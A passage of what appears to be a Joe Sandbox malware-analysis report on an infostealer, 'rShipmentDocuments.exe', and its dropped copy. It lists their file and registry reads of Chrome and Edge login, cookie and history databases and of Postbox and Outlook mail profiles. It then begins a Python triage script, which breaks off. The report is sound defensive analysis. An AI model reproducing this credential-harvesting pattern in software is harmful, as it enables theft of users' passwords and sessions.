                    msyh.ttc (x2), msyhl.ttc (x2), msyhbd.ttc, mingliub.ttc (x2), monbaiti.ttf, msgothic.ttc (x2), mvboli.ttf,
                    mmrtext.ttf, mmrtextb.ttf, Nirmala.ttf, NirmalaS.ttf, NirmalaB.ttf, pala.ttf, palai.ttf, palab.ttf, palabi.ttf,
                    segoepr.ttf, segoeprb.ttf, segoesc.ttf, segoescb.ttf, seguihis.ttf, simsun.ttc, simsunb.ttf,
                    Sitka.ttc (x2), SitkaI.ttc, SitkaB.ttc (x2), SitkaZ.ttc, sylfaen.ttf, symbol.ttf, tahoma.ttf, tahomabd.ttf, timesi.ttf, trebucbd.ttf,
                    verdana.ttf, verdanai.ttf, verdanab.ttf, verdanaz.ttf, webdings.ttf, wingding.ttf,
                    YuGothR.ttc (x2), YuGothM.ttc (x2), YuGothL.ttc, YuGothB.ttc, holomdl2.ttf,
                    AGENCYR.TTF, AGENCYB.TTF, ALGER.TTF, BKANT.TTF, ANTQUAI.TTF, BASKVILL.TTF, BOD_BLAI.TTF, BOD_CBI.TTF, BOD_PSTC.TTF, BOOKOSB.TTF,
                    BRLNSDB.TTF, BRLNSB.TTF, BROADW.TTF, BSSYM7.TTF, CALIFR.TTF, CALIFI.TTF, CALISTI.TTF, CALISTB.TTF, CALISTBI.TTF, CASTELAR.TTF,
                    SCHLBKI.TTF, SCHLBKB.TTF, SCHLBKBI.TTF, CENTAUR.TTF, CENTURY.TTF, CHILLER.TTF, COLONNA.TTF, COOPBL.TTF, COPRGTL.TTF, COPRGTB.TTF,
                    DUBAI-REGULAR.TTF, ELEPHNTI.TTF, ERASLGHT.TTF, FRABK.TTF, FRSCRIPT.TTF, GARA.TTF, GARABD.TTF, GIGI.TTF, GIL_____.TTF, GILBI___.TTF,
                    GOTHICBI.TTF, GOUDYSTO.TTF, HARLOWSI.TTF, HTOWERTI.TTF, ITCEDSCR.TTF, LATINWD.TTF, LBRITEI.TTF, LEELAWAD.TTF, LFAXI.TTF, LHANDW.TTF,
                    LSANS.TTF, LSANSDI.TTF, LTYPE.TTF, MOD20.TTF, PER_____.TTF, PERBI___.TTF
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Queries volume information: C:\Users\user\Desktop\rShipmentDocuments.exe VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
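The file and registry rows above are the evidence behind the report's "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures: the dropped ZOlmYtPdlO.exe opens the Chromium credential and session databases (Login Data, Web Data, Cookies, History), and both the original sample and the dropped copy probe the Postbox profile directory and the Outlook messaging profile key, while the original sample also reads the machine's MachineGuid as a host identifier. The Python below is an added triage example, not code from the Joe Sandbox report or its signature engine. It parses behaviour rows in the form this report exports (source process fused to the action, a trailing "Jump to behavior" link, or the cells separated by " | "), tags each touched artifact, and returns the processes that read browser credential stores and probe mail profiles in the same run. The sample rows are copied from this report; the tag names, the RULES table and the stealer_verdict() combination are the author's assumptions, not Joe Sandbox signatures.

```python
"""Triage of Joe Sandbox behaviour rows for credential-store access.

Added example; not code from the Joe Sandbox report or its signature engine.
Tag names, RULES and stealer_verdict() are the author's assumptions.
"""
import re
from collections import defaultdict

# Constructed sample: rows copied from this report's "Stealing of Sensitive
# Information" section, in the fused form the text export produces
# (".exeFile opened:", trailing "Jump to behavior" link text).
SAMPLE_ROWS = [
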